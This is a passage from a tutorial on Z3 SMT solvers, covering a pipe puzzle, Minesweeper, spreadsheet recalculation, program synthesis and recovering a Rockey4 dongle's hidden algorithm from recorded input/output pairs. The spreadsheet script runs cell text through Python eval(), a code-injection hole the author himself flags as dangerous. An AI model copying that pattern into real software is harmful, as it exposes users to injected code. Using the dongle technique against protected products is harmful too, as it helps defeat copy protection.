Security tokens like "RSA SecurID" can be viewed as just a CSPRNG [34] with a secret seed. The token shows a new pseudorandom number each minute, and the server can predict it, because it knows the seed. Imagine if such a token implemented an LCG: it would be much easier to break!

[32] National Security Agency
[33] https://en.wikipedia.org/wiki/Dual_EC_DRBG
[34] Cryptographically Secure Pseudorandom Number Generator

5.10 Solving a pipe puzzle using the Z3 SMT-solver

"Pipe puzzle" is a popular puzzle (just google "pipe puzzle" and look at the images). This is how a shuffled puzzle looks:

Figure 2: Shuffled puzzle

... and solved:

Figure 3: Solved puzzle

Let's try to find a way to solve it.

5.10.1 Generation

First, we need to generate it. Here is my quick idea. Take an 8*16 array of cells; each cell may contain some type of block. There are joints between the cells: vertical joints vjoints[...,0] .. vjoints[...,15] and horizontal joints hjoints[0,...] .. hjoints[7,...] (see the figure).
Blue lines are horizontal joints; red lines are vertical joints. We just set each joint, randomly, to 0/false (absent) or 1/true (present). Once set, it is easy to find the type of each cell:

joints | our internal name | angle | symbol
   0   | type 0            | 0°    | (space)
   2   | type 2a           | 0°    | │
   2   | type 2a           | 90°   | ─
   2   | type 2b           | 0°    | ┌
   2   | type 2b           | 90°   | ┐
   2   | type 2b           | 180°  | ┘
   2   | type 2b           | 270°  | └
   3   | type 3            | 0°    | ├
   3   | type 3            | 90°   | ┬
   3   | type 3            | 180°  | ┤
   3   | type 3            | 270°  | ┴
   4   | type 4            | 0°    | ┼

Dangling joints can be present at the first stage (i.e., a cell with only one joint), but they are removed recursively, and such cells are transformed into empty cells. Hence, at the end, all cells have at least two joints, and the whole plumbing system has no connections to the outer world. I hope this makes things clearer.

The C source code of the generator is here: https://github.com/dennis714/SAT_SMT_article/tree/master/SMT/pipe/generator . All horizontal joints are stored in the global array hjoints[] and all vertical ones in vjoints[]. The C program generates ANSI-colored output like the one shown above (figures 2 and 3), plus an array of types, with no angle information for each cell:

[
["0", "0", "2b", "3", "2a", "2a", "2a", "3", "3", "2a", "3", "2b", "2b", "2b", "0", "0"],
["2b", "2b", "3", "2b", "0", "0", "2b", "3", "3", "3", "3", "3", "4", "2b", "0", "0"],
["3", "4", "2b", "0", "0", "0", "3", "2b", "2b", "4", "2b", "3", "4", "2b", "2b", "2b"],
["2b", "4", "3", "2a", "3", "3", "3", "2b", "2b", "3", "3", "3", "2a", "2b", "4", "3"],
["0", "2b", "3", "2b", "3", "4", "2b", "3", "3", "2b", "3", "3", "3", "0", "2a", "2a"],
["0", "0", "2b", "2b", "0", "3", "3", "4", "3", "4", "3", "3", "3", "2b", "3", "3"],
["0", "2b", "3", "2b", "0", "3", "3", "4", "3", "4", "4", "3", "0", "3", "4", "3"],
["0", "2b", "3", "3", "2a", "3", "2b", "2b", "3", "3", "3", "3", "2a", "3", "3", "2b"],
]

5.10.2 Solving

First of all, we will think of the puzzle as an 8*16 array of cells, where each cell has four bits: "T" (top), "B" (bottom), "L" (left), "R" (right). Each bit represents half of a joint.
(The figure here shows the 8*16 grid of cells, rows [0,...] .. [7,...] and columns [...,0] .. [...,15], each cell carrying its four T/B/L/R half-joint bits.)

Now we define arrays for each of the four half-joints, plus angle information:

HEIGHT=8
WIDTH=16

# if T/B/R/L is Bool instead of Int, the Z3 solver will work faster
T=[[Bool('cell_%d_%d_top' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
B=[[Bool('cell_%d_%d_bottom' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
R=[[Bool('cell_%d_%d_right' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
L=[[Bool('cell_%d_%d_left' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
A=[[Int('cell_%d_%d_angle' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]

We know that if a half-joint is present, the corresponding half-joint of the neighbouring cell must also be present, and vice versa.
We define this using these constraints:

# shorthand variables for True and False:
t=True
f=False

# "top" of each cell must be equal to "bottom" of the cell above
# "bottom" of each cell must be equal to "top" of the cell below
# "left" of each cell must be equal to "right" of the cell at left
# "right" of each cell must be equal to "left" of the cell at right
for r in range(HEIGHT):
    for c in range(WIDTH):
        if r!=0:
            s.add(T[r][c]==B[r-1][c])
        if r!=HEIGHT-1:
            s.add(B[r][c]==T[r+1][c])
        if c!=0:
            s.add(L[r][c]==R[r][c-1])
        if c!=WIDTH-1:
            s.add(R[r][c]==L[r][c+1])

# "left" of each cell of the first column shouldn't have any connection,
# and the same goes for "right" of each cell of the last column
for r in range(HEIGHT):
    s.add(L[r][0]==f)
    s.add(R[r][WIDTH-1]==f)

# "top" of each cell of the first row shouldn't have any connection,
# and the same goes for "bottom" of each cell of the last row
for c in range(WIDTH):
    s.add(T[0][c]==f)
    s.add(B[HEIGHT-1][c]==f)

Now we will enumerate all the cells of the initial array (5.10.1). The first two cells there are empty. The third one has type "2b". This is "┌", and it can be oriented in 4 possible ways. If it has angle 0°, the bottom and right half-joints are present and the others are absent. If it has angle 90°, it looks like "┐", and the bottom and left half-joints are present, the others absent.
In plain English: "if a cell of this type has angle 0°, these half-joints must be present, OR if it has angle 90°, these other half-joints must be present, OR, etc." Likewise, we define all these rules for all types and all possible angles:

for r in range(HEIGHT):
    for c in range(WIDTH):
        ty=cells_type[r][c]
        if ty=="0":
            s.add(A[r][c]==0)
            s.add(T[r][c]==f, B[r][c]==f, L[r][c]==f, R[r][c]==f)
        if ty=="2a":
            s.add(Or(And(A[r][c]==0,   L[r][c]==f, R[r][c]==f, T[r][c]==t, B[r][c]==t),   # │
                     And(A[r][c]==90,  L[r][c]==t, R[r][c]==t, T[r][c]==f, B[r][c]==f)))  # ─
        if ty=="2b":
            s.add(Or(And(A[r][c]==0,   L[r][c]==f, R[r][c]==t, T[r][c]==f, B[r][c]==t),   # ┌
                     And(A[r][c]==90,  L[r][c]==t, R[r][c]==f, T[r][c]==f, B[r][c]==t),   # ┐
                     And(A[r][c]==180, L[r][c]==t, R[r][c]==f, T[r][c]==t, B[r][c]==f),   # ┘
                     And(A[r][c]==270, L[r][c]==f, R[r][c]==t, T[r][c]==t, B[r][c]==f)))  # └
        if ty=="3":
            s.add(Or(And(A[r][c]==0,   L[r][c]==f, R[r][c]==t, T[r][c]==t, B[r][c]==t),   # ├
                     And(A[r][c]==90,  L[r][c]==t, R[r][c]==t, T[r][c]==f, B[r][c]==t),   # ┬
                     And(A[r][c]==180, L[r][c]==t, R[r][c]==f, T[r][c]==t, B[r][c]==t),   # ┤
                     And(A[r][c]==270, L[r][c]==t, R[r][c]==t, T[r][c]==t, B[r][c]==f)))  # ┴
        if ty=="4":
            s.add(A[r][c]==0)
            s.add(T[r][c]==t, B[r][c]==t, L[r][c]==t, R[r][c]==t)                         # ┼

Full source code is here: https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/pipe/solver/solve_pipe_puzzle1.py .

It produces this result (it prints the angle for each cell plus a (pseudo)graphical representation):

Figure 4: Solver script output

It worked for 4 seconds on my old and slow Intel Atom N455 1.66GHz. Is that fast? I don't know, but again, what is really cool is that we know nothing about the mathematical background of all this: we just defined cells and (half-)joints and the relations between them.

The next question is: how many solutions are possible? Using the method described earlier (5.6), I altered the solver script [35], and the solver said two solutions are possible. Let's compare the two solutions using gvimdiff:

Figure 5: gvimdiff output (pardon my red cursor in the bottom-left corner of the left pane)

4 cells in the middle can be oriented differently. Perhaps other puzzles may produce different results.
P.S. Each half-joint is defined as a boolean. In fact, the first version of the solver was written using an integer type for half-joints, with 0 for False and 1 for True. I did it that way because I wanted to make the source code tidier and narrower, without long words like "False" and "True". It worked, but slower. Perhaps Z3 handles boolean data types faster? Better? Anyway, I am writing this to note that an integer type can also be used instead of boolean, if needed.

[35] https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/pipe/solver/solve_pipe_puzzle2.py

5.11 Cracking Minesweeper with the Z3 SMT solver

For those who are not very good at playing Minesweeper (like me), it is possible to predict bomb placement without touching a debugger. Here I clicked somewhere and see revealed empty cells and cells with a known number of "neighbours".

What do we have here, actually? Hidden cells, empty cells (where bombs are not present), and empty cells with numbers, which show how many bombs are placed nearby.

5.11.1 The method

Here is what we can do: we will try to place a bomb on every possible hidden cell and ask the Z3 SMT solver whether it can disprove the very fact that a bomb can be placed there.

Take a look at this fragment. "?" marks a hidden cell, "." an empty cell, and a number is the number of neighbouring bombs.

    C1 C2 C3
R1   ?  ?  ?
R2   ?  3  .
R3   ?  1  .

So there are 5 hidden cells. We will check each hidden cell by placing a bomb there. Let's first pick the top-left cell:

    C1 C2 C3
R1   *  ?  ?
R2   ?  3  .
R3   ?  1  .

Then we will try to solve the following system of equations (RrCc is the cell at row r and column c):

• R1C2+R2C1+R2C2=1 (because we placed a bomb at R1C1)
• R2C1+R2C2+R3C1=1 (because we have "1" at R3C2)
• R1C1+R1C2+R1C3+R2C1+R2C2+R2C3+R3C1+R3C2+R3C3=3 (because we have "3" at R2C2)
• R1C2+R1C3+R2C2+R2C3+R3C2+R3C3=0 (because we have "." at R2C3)
• R2C2+R2C3+R3C2+R3C3=0 (because we have "." at R3C3)

As it turns out, this system of equations is satisfiable, so there could be a bomb at this cell. But this information is not interesting to us, since we want to find cells we can freely click on, so we will try another one. And if the equations are unsatisfiable, that implies that a bomb cannot be there, and we can click on that cell.
5.11.2 The code

#!/usr/bin/python
from z3 import *
import sys

known=[
"01?10001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"????1001?",
"????3101?",
"?????211?",
"?????????"]

WIDTH=len(known[0])
HEIGHT=len(known)
print("WIDTH=", WIDTH, "HEIGHT=", HEIGHT)

def chk_bomb(row, col):
    s=Solver()

    cells=[[Int('cell_r=%d_c=%d' % (r,c)) for c in range(WIDTH+2)] for r in range(HEIGHT+2)]

    # make a border
    for c in range(WIDTH+2):
        s.add(cells[0][c]==0)
        s.add(cells[HEIGHT+1][c]==0)
    for r in range(HEIGHT+2):
        s.add(cells[r][0]==0)
        s.add(cells[r][WIDTH+1]==0)

    for r in range(1,HEIGHT+1):
        for c in range(1,WIDTH+1):
            t=known[r-1][c-1]
            if t in "012345678":
                s.add(cells[r][c]==0)
                # we need the empty border so the following expression
                # would work for all possible cases:
                s.add(cells[r-1][c-1] + cells[r-1][c] + cells[r-1][c+1] +
                      cells[r][c-1] + cells[r][c+1] +
                      cells[r+1][c-1] + cells[r+1][c] + cells[r+1][c+1]==int(t))

    # place a bomb:
    s.add(cells[row][col]==1)

    result=str(s.check())
    if result=="unsat":
        print("row=%d col=%d, unsat!" % (row, col))

# enumerate all hidden cells:
for r in range(1,HEIGHT+1):
    for c in range(1,WIDTH+1):
        if known[r-1][c-1]=="?":
            chk_bomb(r, c)

The code is almost self-explanatory. We need a border for the same reason Conway's "Game of Life" implementations also have one (to make the calculation functions simpler). Whenever we know that a cell is free of a bomb, we put a zero there. Whenever we know the number of neighbours, we add a constraint, again, just like in the "Game of Life": the number of neighbours must be equal to the number we have seen in Minesweeper. Then we place a bomb somewhere and check. Let's run it:

row=1 col=3, unsat!
row=6 col=2, unsat!
row=6 col=3, unsat!
row=7 col=4, unsat!
row=7 col=9, unsat!
row=8 col=9, unsat!

These are the cells where I can click safely, so I did. Now we have more information, so we update the input:

known=[
"01110001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"?11?1001?",
"???331011",
"?????2110",
"???????10"]

I run it again:

row=7 col=1, unsat!
row=7 col=2, unsat!
row=7 col=3, unsat!
row=8 col=3, unsat!
row=9 col=5, unsat!
row=9 col=6, unsat!

I click on these cells and update the input again:

known=[
"01110001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"?11?1001?",
"222331011",
"??2??2110",
"????22?10"]

row=8 col=2, unsat!
row=9 col=4, unsat!

This is the last update:

known=[
"01110001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"?11?1001?",
"222331011",
"?22??2110",
"???322?10"]

... and the last result:

row=9 col=1, unsat!
row=9 col=2, unsat!

Voila! The source code: https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/minesweeper/minesweeper_solver.py .

Some discussion on HN: https://news.ycombinator.com/item?id=13797375 .

See also: cracking Minesweeper using a SAT solver: 11.3.

5.12 Recalculating a micro-spreadsheet using Z3Py

There is a nice exercise [36]: write a program to recalculate a micro-spreadsheet, like this one:

1     0        B0+B2        A0*B0*C0
123   10       12           11
667   A0+B1    (C1*A0)*122  A3+C2

[36] Blog post in Russian: http://thesz.livejournal.com/280784.html

As it turns out, though overkill, this can be solved using Z3 with little effort:

#!/usr/bin/python
from z3 import *
import sys, re

# MS Excel or LibreOffice style,
# except that the first top-left cell is A0, not A1
def coord_to_name(R, C):
    return "ABCDEFGHIJKLMNOPQRSTUVWXYZ"[R]+str(C)

# open the file and parse it as a list of lists;
# filter(None, ...) removes empty sublists:
f=open(sys.argv[1],"r")
ar=list(filter(None, [item.rstrip().split() for item in f.readlines()]))
f.close()

WIDTH=len(ar[0])
HEIGHT=len(ar)

# cells{} is a dictionary with keys like "A0", "B9", etc:
cells={}
for R in range(HEIGHT):
    for C in range(WIDTH):
        name=coord_to_name(R, C)
        cells[name]=Int(name)

s=Solver()

cur_R=0
cur_C=0
for row in ar:
    for c in row:
        # a string like "A0+B2" becomes 'cells["A0"]+cells["B2"]':
        c=re.sub(r'([A-Z]{1}[0-9]+)', r'cells["\1"]', c)
        st="cells[\"%s\"]==%s" % (coord_to_name(cur_R, cur_C), c)
        # evaluate the string.
        # The Z3Py expression is constructed at this step:
        e=eval(st)
        # add the constraint:
        s.add(e)
        cur_C=cur_C+1
    cur_R=cur_R+1
    cur_C=0

result=str(s.check())
print(result)
if result=="sat":
    m=s.model()
    for r in range(HEIGHT):
        for c in range(WIDTH):
            sys.stdout.write(str(m[cells[coord_to_name(r, c)]])+"\t")
        sys.stdout.write("\n")

(https://github.com/dennis714/yurichev.com/blob/master/blog/spreadsheet/1.py)

All we do is create a pack of integer variables, one for each cell, named A0, B1, etc. All of them are stored in the cells[] dictionary, keyed by string. Then we parse all the strings from the cells and add to the list of constraints either A0=123 (in the case of a number in a cell) or A0=B1+C2 (in the case of an expression in a cell). There is a slight preparation step: a string like A0+B2 becomes cells["A0"]+cells["B2"].

Then the string is evaluated using the Python eval() function, which is highly dangerous [37]: imagine if the end user could put a string other than an expression into a cell? Nevertheless, it serves our purposes well, because it is the simplest way to pass a string with an expression into Z3.

[37] http://stackoverflow.com/questions/1832940/is-using-eval-in-python-a-bad-practice

Z3 does the job with little effort:

% python 1.py test1
sat
1       0       135     82041
123     10      12      11
667     11      1342    83383

5.12.1 Unsat core

Now the problem: what if there is a circular dependency? Like:

1       0       B0+B2   A0*B0
123     10      12      11
C1+123  C0*123  A0*122  A3+C2

The first two cells of the last row (C0 and C1) are linked to each other. Our program will just say "unsat", meaning it could not satisfy all the constraints together. We cannot use that as an error message reported to the end user, because it is highly unfriendly. However, we can fetch the unsat core, i.e., the list of variables which Z3 finds conflicting:

...
s=Solver()
s.set(unsat_core=True)
...
        # add the constraint:
        s.assert_and_track(e, coord_to_name(cur_R, cur_C))
...
if result=="sat":
    ...
else:
    print(s.unsat_core())

(https://github.com/dennis714/yurichev.com/blob/master/blog/spreadsheet/2.py)

We should explicitly turn on unsat core support and use the assert_and_track() method instead of add(), because this feature slows down the whole process and is turned off by default.
That works:

% python 2.py test_circular
unsat
[C0, C1]

Perhaps these variables could be removed from the 2D array, marked as unresolved, and the whole spreadsheet recalculated again.

5.12.2 Stress test

How do we generate a large random spreadsheet? Here is what we can do. First, create a random DAG [38], like this one:

[38] Directed acyclic graph
randomNonNumberExpression[g,vertex]]

(* Main part *)

(* Create random graph *)
In[21]:= WIDTH=7;HEIGHT=8;TOTAL=WIDTH*HEIGHT
Out[21]= 56
In[24]:= g=DirectedGraph[RandomGraph[BernoulliGraphDistribution[TOTAL,0.05]],"Acyclic"];
...
(* Generate random expressions and numbers *)
In[26]:= expressions=Map[assignNumberOrExpr[g,#]&,VertexList[g]];
(* Make 2D table of it *)
In[27]:= t=Partition[expressions,WIDTH];
(* Export as tab-separated values *)
In[28]:= Export["/home/dennis/1.txt",t,"TSV"]
Out[28]= /home/dennis/1.txt
In[29]:= Grid[t,Frame->All,Alignment->Left]

Here is an output from Grid[] (one row per line):

846  499  A3*913-H4  808  278  303  D1+579+B6
B4*860+D2  999  59  442  425  A5*163+B2+127*C2*927*D3*213+C1  583
G6*379-C3-436-C4-289+H6  972  804  D2  G5+108-F1*413-D3  B5  G4*981*D2
F2  E0  B6-731-D3+791+B4*92+C1  551  F4*922*C2+760*A6-992+B4-184-A4  B1-624-E3  F4+182+A4*940-E1+76*C1
519  G1*402+D1*107*G3-458*A1  D3  B4  B3*811-D3*345+E0  B5  H5
F5-531+B5-222*E4  9  B5+106*B6+600-B1  E3  A5+866*F6+695-A3*226+C6  F4*102*E4*998-H0  B1-616-G5+812-A5
C3-956*A5  G4*408-D3*290*B6-899*G5+400+F1  B2-701+H6  A3+782*A5+46-B3-731+C1  42  287  H0
B4-792*H4*407+F6-425-E1  D2  D3  F2-327*G4*35*E1  E1+376*A6-606*F6*554+C5  E3  F6*484+C1-114-H4-638-A3

Using this script, I can generate a random spreadsheet of 26·500 = 13000 cells, which seems to be processed in a couple of seconds.

5.12.3 The files

The files, including the Mathematica notebook: https://github.com/dennis714/yurichev.com/tree/master/blog/spreadsheet .

6 Program synthesis

Program synthesis is the process of automatic program generation, in accordance with some specific goals.

6.1 Synthesis of a simple program using the Z3 SMT solver

Sometimes a multiplication operation can be replaced with several shift/addition/subtraction operations. Compilers do so because such a pack of instructions can be executed faster. For example, multiplication by 19 is replaced by GCC 5.4 with a pair of instructions: lea edx, [eax+eax*8] and lea eax, [eax+edx*2]. This is sometimes also called "superoptimization".

Let's see if we can find the shortest possible instruction pack for some specified multiplier.
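As a quick sanity check (not in the original), the two LEA instructions are easy to model in a few lines of Python: the first computes eax + eax*8 = 9·eax, the second eax + edx*2 = eax + 18·eax = 19·eax, with the usual 32-bit wrap-around:

```python
MASK = 0xFFFFFFFF  # emulate 32-bit register wrap-around

def mul19(eax):
    # lea edx, [eax+eax*8]  ; edx = eax*9
    edx = (eax + eax * 8) & MASK
    # lea eax, [eax+edx*2]  ; eax = eax + eax*18 = eax*19
    eax = (eax + edx * 2) & MASK
    return eax

for x in (0, 1, 7, 12345, 0xFFFFFFFF):
    assert mul19(x) == (x * 19) & MASK
```

The synthesis task below is exactly this, in reverse: given the multiplier, find such a sequence.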
As I've already written once, an SMT solver can be seen as a solver of huge systems of equations. The task is to construct such a system of equations which, when solved, produces a short program. I will use an electronics analogy here; it can make things a little simpler.

First of all, what will our program consist of? There will be 3 allowed operations: ADD/SUB/SHL. Only registers are allowed as operands, except for the second operand of SHL (which can be in the 1..31 range). Each register is assigned only once (as in SSA39).

39 Static single assignment form

And there will be a "magic block", which takes all previous register states, plus an operation type and operands, and produces the value of the next register's state.

op ------------+
op1_reg -----+ |
op2_reg ---+ | |
           | | |
           v v v
        +---------------+
        |               |
registers -> |          | -> new register's state
        |               |
        +---------------+

Now let's take a look at our schematics at the top level:

0 -> blk -> blk -> blk .. -> blk -> 0
1 -> blk -> blk -> blk .. -> blk -> multiplier

Each block takes the previous state of the registers and produces new states. There are two chains. The first chain takes 0 as the state of R0 at the very beginning, and the chain is supposed to produce 0 at the end (since zero multiplied by any value is still zero). The second chain takes 1 and must produce the multiplier as the state of the very last register (since 1 multiplied by the multiplier must equal the multiplier).

Each block is "controlled" by the operation type, operands, etc. For each column, there is its own set. Now you can view these two chains as two equations. The ultimate goal is to find such a state of all operation types and operands that the first chain will equal 0, and the second the multiplier.

Let's also take a look inside the "magic block":

            op1_reg        op
               |           |
               v           v
                        +-----+
registers -+-> selector1 --> | ADD |
           |                 | SUB | ---> result
           |                 | SHL |
           +-> selector2 --> +-----+
                   ^    ^
                   |    |
              op2_reg  op2_imm

Each selector can be viewed as a simple multi-positional switch. If the operation is SHL, a value in the 1..31 range is used as the second operand.

So you can imagine this electric circuit, and your goal is to turn all the switches into such a state that the two chains will have 0 and the multiplier on their outputs. This sounds like a logic puzzle in some way. Now we will try to use Z3 to solve this puzzle.
First, we define all variables:

R=[[BitVec('S_s%d_c%d' % (s, c), 32) for s in range(MAX_STEPS)] for c in range(CHAINS)]
op=[Int('op_s%d' % s) for s in range(MAX_STEPS)]
op1_reg=[Int('op1_reg_s%d' % s) for s in range(MAX_STEPS)]
op2_reg=[Int('op2_reg_s%d' % s) for s in range(MAX_STEPS)]
op2_imm=[BitVec('op2_imm_s%d' % s, 32) for s in range(MAX_STEPS)]

R[][] is the registers' state for each chain and each step. On the contrary, the op/op1_reg/op2_reg/op2_imm variables are defined for each step, but are shared by both chains, since both chains at each column have the same operation/operands.

Now we must limit the range of operations, and also, the register number at each step must not be bigger than the step number; in other words, the instruction at each step is allowed to access only registers which were already set before:

for s in range(1, STEPS): # for each step
    sl.add(And(op[s]>=0, op[s]<=2))
    sl.add(And(op1_reg[s]>=0, op1_reg[s]<s))
    sl.add(And(op2_reg[s]>=0, op2_reg[s]<s))
    sl.add(And(op2_imm[s]>=1, op2_imm[s]<=31))

Fix the register of the first step for both chains, and require the last register to equal the chain's input multiplied by the multiplier:

for c in range(CHAINS): # for each chain:
    sl.add(R[c][0]==chain_inputs[c])
    sl.add(R[c][STEPS-1]==chain_inputs[c]*multiplier)

Now let's add the "magic blocks":

    for s in range(1, STEPS):
        sl.add(R[c][s]==simulate_op(R,c, op[s], op1_reg[s], op2_reg[s], op2_imm[s]))

Now, how is the "magic block" defined?

def selector(R, c, s):
    # for all MAX_STEPS:
    return If(s==0, R[c][0],
           If(s==1, R[c][1],
           If(s==2, R[c][2],
           If(s==3, R[c][3],
           If(s==4, R[c][4],
           If(s==5, R[c][5],
           If(s==6, R[c][6],
           If(s==7, R[c][7],
           If(s==8, R[c][8],
           If(s==9, R[c][9],
           0)))))))))) # default

def simulate_op(R, c, op, op1_reg, op2_reg, op2_imm):
    op1_val=selector(R,c,op1_reg)
    return If(op==0, op1_val + selector(R, c, op2_reg),
           If(op==1, op1_val - selector(R, c, op2_reg),
           If(op==2, op1_val << op2_imm,
           0))) # default

It is very important to understand: if the operation is ADD/SUB, op2_imm's value is just ignored. Otherwise, if the operation is SHL, the value of op2_reg is ignored. Just like in the case of a digital circuit.

The code: https://github.com/dennis714/SAT_SMT_article/blob/master/pgm_synth/mult.py .
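Before running the solver, it may help to have a plain-Python reference interpreter for this three-operation ISA (an illustration, not part of mult.py). Any synthesized sequence can be checked against it, for example the program the solver finds for multiplier 12 (r1=SHL r0, 2; r2=SHL r1, 1; r3=ADD r1, r2):

```python
MASK = 0xFFFFFFFF  # 32-bit registers, as in the Z3 model

def run(program, r0):
    """Interpret a synthesized sequence for the toy ADD/SUB/SHL ISA.

    program is a list of (op, arg1, arg2) tuples; arguments index
    earlier registers, except SHL's second argument, which is an
    immediate in the 1..31 range."""
    regs = [r0]
    for op, a, b in program:
        if op == "ADD":
            regs.append((regs[a] + regs[b]) & MASK)
        elif op == "SUB":
            regs.append((regs[a] - regs[b]) & MASK)
        elif op == "SHL":
            regs.append((regs[a] << b) & MASK)
    return regs[-1]

# r1=SHL r0, 2 ; r2=SHL r1, 1 ; r3=ADD r1, r2  ->  4x + 8x = 12x
mul12 = [("SHL", 0, 2), ("SHL", 1, 1), ("ADD", 1, 2)]
for x in (0, 1, 7, 1000003):
    assert run(mul12, x) == (x * 12) & MASK
```

The solver's own "tests are OK" line does essentially the same check on random inputs.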
Now let's see how it works:

% ./mult.py 12
multiplier= 12
attempt, STEPS= 2
unsat
attempt, STEPS= 3
unsat
attempt, STEPS= 4
sat!
r1=SHL r0, 2
r2=SHL r1, 1
r3=ADD r1, r2
tests are OK

The first step is always the step containing 0/1, i.e., r0. So when our solver reports 4 steps, this means 3 instructions.

Something harder:

% ./mult.py 123
multiplier= 123
attempt, STEPS= 2
unsat
attempt, STEPS= 3
unsat
attempt, STEPS= 4
unsat
attempt, STEPS= 5
sat!
r1=SHL r0, 2
r2=SHL r1, 5
r3=SUB r2, r1
r4=SUB r3, r0
tests are OK

Now the code multiplying by 1234:

r1=SHL r0, 6
r2=ADD r0, r1
r3=ADD r2, r1
r4=SHL r2, 4
r5=ADD r2, r3
r6=ADD r5, r4

Looks great, but it took 23 seconds to find it on my Intel Xeon CPU E3-1220 @ 3.10GHz. I agree, this is far from practical usage. Also, I'm not quite sure that this piece of code will work faster than a single multiplication instruction. But anyway, it's a good demonstration of SMT solvers' capabilities.

The code multiplying by 12345 (150 seconds):

r1=SHL r0, 5
r2=SHL r0, 3
r3=SUB r2, r1
r4=SUB r1, r3
r5=SHL r3, 9
r6=SUB r4, r5
r7=ADD r0, r6

Multiplication by 123456 (8 minutes!):

r1=SHL r0, 9
r2=SHL r0, 13
r3=SHL r0, 2
r4=SUB r1, r2
r5=SUB r3, r4
r6=SHL r5, 4
r7=ADD r1, r6

6.1.1 A few notes

I've removed SHR instruction support, simply because code multiplying by a constant makes no use of it. Even more: it's not a problem to add support for constants as the second operand of all instructions, but again, you wouldn't find a piece of code which does this job and uses some additional constants. Or maybe I'm wrong?

Of course, for another job you'll need to add support for constants and other operations. But at the same time, it will work slower and slower. So I had to keep the ISA40 of this toy CPU41 as compact as possible.

6.1.2 The code

https://github.com/dennis714/SAT_SMT_article/blob/master/pgm_synth/mult.py .

6.2 Rockey dongle: finding an unknown algorithm using only input/output pairs

(This text was first published in August 2012 in my blog: http://blog.yurichev.com/node/71 .)

Some smartcards can execute Java or .NET code — that's a way to hide your sensitive algorithm in a chip that is very hard to break into (decapsulate).
For example, one may encrypt/decrypt data files with a hidden crypto algorithm, rendering piracy of such software close to impossible — an encrypted data file created on software with the smartcard connected would be impossible to decrypt on a cracked version of the same software. (This leads to many nuisances, though.) That's what is called a black box.

Some software protection dongles offer this functionality too. One example is Rockey4 42.

40 Instruction Set Architecture
41 Central processing unit
42 http://www.rockey.nl/en/rockey.html

Figure 7: Rockey4 dongle

This is a small dongle connected via USB. It contains some user-defined memory, but also memory for user algorithms.

The virtual (toy) CPU for these algorithms is very simple: it offers only 8 16-bit registers (however, only 4 can be set and read) and 8 operations (addition, subtraction, cyclic left shift, multiplication, OR, XOR, AND, negation). The second instruction argument can be a constant (from 0 to 63) instead of a register.

Each algorithm is described by a string like A=A+B, B=C*13, D=D^A, C=B*55, C=C&A, D=D|A, A=A*9, A=A&B. There is no memory, no stack, no conditional/unconditional jumps, etc. Each algorithm, obviously, can't have side effects, so they are actually pure functions and their results can be memoized.

By the way, as mentioned in the Rockey4 manual, the first and the last instruction cannot have constants. Maybe that's because these fields are used for some internal data: each algorithm's start and end should be marked somehow internally anyway.

Would it be possible to reveal a hidden, impossible-to-read algorithm only by recording input/output dongle traffic? Common sense tells us "no". But we can try anyway.

Since my goal wasn't to break into some Rockey-protected software, and I was interested only in the limits (which algorithms we could find), I made some things simpler: we will work with only 4 16-bit registers, and there will be only 6 operations (add, subtract, multiply, OR, XOR, AND).

Let's first calculate how much information would have to be covered in the brute-force case. There are 384 possible instructions of the reg=reg,op,reg format for 4 registers and 6 operations, and also 6144 instructions of the reg=reg,op,constant format. Remember that the constant is limited to 63 as its maximal value?
That helps us a little. So there are 6528 possible instructions in total. This means there are ≈1.1·10^19 possible 5-instruction algorithms. That's too much.

How can we express each instruction as a system of equations? Remembering some school mathematics, I wrote this:

Function one_step()=
    # Each Bx is an integer, but may only be 0 or 1.
    # Only one of B1..B4 and one of B5..B9 can be set
    reg1=B1*A + B2*B + B3*C + B4*D
    reg_or_constant2=B5*A + B6*B + B7*C + B8*D + B9*constant
    reg1 should not be equal to reg_or_constant2

    # Only one of B10..B15 can be set
    result=result+B10*(reg1*reg2)
    result=result+B11*(reg1^reg2)
    result=result+B12*(reg1+reg2)
    result=result+B13*(reg1-reg2)
    result=result+B14*(reg1|reg2)
    result=result+B15*(reg1&reg2)

    # B16 - true if the register isn't updated in this part
    # B17 - true if the register is updated in this part
    # (B16 cannot be equal to B17; likewise for B18/B19, B20/B21, B22/B23)
    A=B16*A + B17*result
    B=B18*B + B19*result
    C=B20*C + B21*result
    D=B22*D + B23*result

That's how we can express each instruction of the algorithm. A 5-instruction algorithm can be expressed like this: one_step (one_step (one_step (one_step (one_step (input_registers))))).

Let's also add five known input/output pairs, and we'll get a system of equations like this:

one_step (one_step (one_step (one_step (one_step (input_1)))))==output_1
one_step (one_step (one_step (one_step (one_step (input_2)))))==output_2
one_step (one_step (one_step (one_step (one_step (input_3)))))==output_3
one_step (one_step (one_step (one_step (one_step (input_4)))))==output_4
.. etc

So the question now is to find 523 boolean values satisfying the known input/output pairs.
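The instruction counts above are easy to re-derive (a quick check, not in the original text): 4 destination registers × 6 operations × 4 first operands × 4 second operands gives the register form, and replacing the second operand with one of 64 constants (0..63) gives the constant form:

```python
regs, ops, consts = 4, 6, 64            # 4 registers, 6 operations, constants 0..63

reg_form   = regs * ops * regs * regs   # dest, op, arg1, arg2 are all registers
const_form = regs * ops * regs * consts # arg2 is a constant instead of a register

assert reg_form == 384
assert const_form == 6144
assert reg_form + const_form == 6528

# the number of distinct 5-instruction algorithms exceeds 10^19:
assert (reg_form + const_form) ** 5 > 10 ** 19
```

Hence the need for a solver: enumerating ~10^19 candidate algorithms directly is hopeless.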
I wrote a small utility to probe the Rockey4 algorithm with random numbers; it produces results in this form:

RY_CALCULATE1: (input) p1=30760 p2=18484 p3=41200 p4=61741 (output) p1=49244 p2=11312 p3=27587 p4=12657
RY_CALCULATE1: (input) p1=51139 p2=7852 p3=53038 p4=49378 (output) p1=58991 p2=34134 p3=40662 p4=9869
RY_CALCULATE1: (input) p1=60086 p2=52001 p3=13352 p4=45313 (output) p1=46551 p2=42504 p3=61472 p4=1238
